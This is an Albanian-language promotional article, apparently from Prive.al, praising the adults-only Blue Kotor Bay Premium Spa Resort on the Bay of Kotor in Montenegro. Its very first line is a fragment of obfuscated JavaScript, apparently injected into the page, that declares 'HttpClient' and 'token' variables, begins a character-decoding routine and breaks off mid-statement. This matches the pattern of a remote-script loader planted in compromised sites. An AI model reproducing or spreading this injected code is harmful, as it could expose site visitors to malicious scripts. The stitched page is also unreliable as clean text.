;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Hiç larg jush ndodhet destinacioni përrallor i verës

By

Ka diçka tejet magjike mes muajve qershor e gusht, e magjikja arrin formën e saj finale kur ne zgjedhim destinacionin perfekt për pushimet e verës.

Në qytetin e fortifikuar të Kotorit në bregdetin Adriatik të Malit të Zi, në një gji afër shkëmbinjve gëlqerorë, gjendet ndalesa që me të provuar një herë do të jetë destinacioni juaj i preferuar – Resorti Blue Kotor Bay.

Përjetoni paqe dhe qetësi të paharrueshme ndërsa shijoni pamjet më të bukura dhe të qeta skenike mbi Gjirin e Kotorrit dhe malet përreth, nga dritarja e dhomës tuaj në resort.

Qoftë një pushim romantik me personin tuaj të zemrës apo miqtë tuaj, Resorti Blue Kotor Bay, ofron akomodime që më së miri i përshtaten karakterit dhe nevojave tuaja.

Pasi të shijoni natyrën e plazhin piktoresk që Kotori ofron, mezi do prisni të ktheheni në dhomën tuaj të projektuar dhe pajisur vetëm me materialet më të mira, ku vëmendje të veçantë i është kushtuar zgjedhjes së dyshekëve që janë komod dhe ideal për relaksim të thellë dhe gjumë të mirë.

Brendësia e dhomës duket si një vazhdimësi e natyrës përreth, e hapur dhe e gjerë, me pamje nga plazhi privat i resortit.

Blue Kotor Bay Premium Spa Resort është një vendpushim premium dhe një kompleks shëndetësor i vendosur në zemër të Gjirit të Kotorrit.

Me një qasje bashkëkohore të eko-modelimit dhe krijimin e harmonisë në çdo cep të hotelit, nga dhoma të dekoruara dhe të mobiluara me kujdes, resorti ofron restorant hoteli, bar aperitiv, deri në oazin paqësor të qendrës së Wellness.

Blue Kotor Bay Premium Spa Resort është një vendpushim vetëm për të rritur, që synon të sigurojë një atmosferë të qetë, qetësi dhe mirëqenie, me staf profesional të angazhuar për të krijuar kujtimet më të mira për mysafirët e saj. /Prive.al

Artikuj të ngjashëm